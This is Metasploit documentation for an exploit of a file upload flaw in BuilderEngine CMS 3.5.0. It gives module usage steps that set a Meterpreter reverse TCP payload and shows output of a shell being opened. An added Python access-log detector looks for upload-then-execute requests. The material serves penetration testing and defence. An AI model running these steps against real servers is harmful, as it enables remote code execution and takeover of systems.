documentation/modules/exploit/multi/http/builderengine_upload_exec.md
BuilderEngine is an open source Content Management System (CMS) that includes blog, eCommerce, and booking modules, among others. A vulnerability was found in the jQuery upload plugin, which could be abused to upload a malicious file, resulting in arbitrary remote code execution under the context of the web server.
According to the public advisory, BuilderEngine 3.5.0 is vulnerable to this attack.
A vulnerable copy was collected by Exploit-DB, which can be downloaded here:
https://www.exploit-db.com/apps/8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip
Another way to test this exploit is by using the Sedna image:
https://www.vulnhub.com/entry/hackfest2016-sedna,181/#
To see if the service is running BuilderEngine, you may use the check command from the module. If the resource is found, then you may see the following output:
msf exploit(builderengine_upload_exec) > check
[*] 192.168.1.123:80 The target appears to be vulnerable.
Knowing that the jquery-file-upload plugin is available, you can try the exploit by following these steps:
1. exploit/multi/http/builderengine_upload_exec
2. set RHOST [Target IP]
3. set PAYLOAD php/meterpreter/reverse_tcp
4. set LHOST [Your IP]
5. exploit
If exploited successfully, you should see an output similar to the following:
msf exploit(builderengine_upload_exec) > exploit
[*] Started reverse TCP handler on 192.168.1.1:4444
[+] Our payload is at: RnrXvNHDaQA.php. Calling payload...
[*] Calling payload...
[*] Sending stage (33986 bytes) to 192.168.1.123
[*] Meterpreter session 3 opened (192.168.1.1:4444 -> 192.168.1.123:51354) at 2017-05-16 14:44:14 -0500
[+] Deleted RnrXvNHDaQA.php
meterpreter >
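Seen from the web server, the run above is a successful POST to the jquery-file-upload plugin followed within seconds by a request for a script that has never been requested before. The following detection logic is an added example, not part of the module or its documentation; the Apache combined-style log format, the URL paths and the sample lines are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

UPLOAD_MARKER = "jquery-file-upload"  # plugin name as given on the page
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# Constructed sample log; every URL path here is an assumption, not the real layout.
SAMPLE_LOG = [
    '192.168.1.50 - - [16/May/2017:14:40:02 -0500] "GET /index.php HTTP/1.1" 200 5120',
    '192.168.1.50 - - [16/May/2017:14:41:10 -0500] "POST /plugins/jquery-file-upload/handler/ HTTP/1.1" 200 310',
    '192.168.1.50 - - [16/May/2017:14:41:12 -0500] "GET /index.php HTTP/1.1" 200 5120',
    '192.168.1.1 - - [16/May/2017:14:44:13 -0500] "POST /plugins/jquery-file-upload/handler/ HTTP/1.1" 200 298',
    '192.168.1.1 - - [16/May/2017:14:44:14 -0500] "GET /uploads/RnrXvNHDaQA.php HTTP/1.1" 200 0',
]

def parse(line):
    """Return (ip, time, method, path, status) or None for unparseable lines."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = m["path"].split("?", 1)[0]  # ignore the query string
    return m["ip"], ts, m["method"], path, int(m["status"])

def find_upload_then_exec(lines, window=timedelta(seconds=60)):
    """Flag first-seen script requests made by a client shortly after that
    client's successful POST to the upload plugin. Lines must be in time order."""
    last_upload = {}  # client ip -> time of its last successful upload POST
    seen = set()      # every path requested so far (baseline of known scripts)
    hits = []
    for ip, ts, method, path, status in filter(None, map(parse, lines)):
        if method == "POST" and UPLOAD_MARKER in path and 200 <= status < 300:
            last_upload[ip] = ts
        elif (SCRIPT_EXT.search(path) and path not in seen
              and ip in last_upload and ts - last_upload[ip] <= window):
            hits.append((ip, path))
        seen.add(path)
    return hits

if __name__ == "__main__":
    for ip, path in find_upload_then_exec(SAMPLE_LOG):
        print(f"ALERT {ip} requested new script {path} right after an upload")
```

Because the module deletes the uploaded file after the session opens (the `Deleted RnrXvNHDaQA.php` line), the access log is more durable evidence than the upload directory.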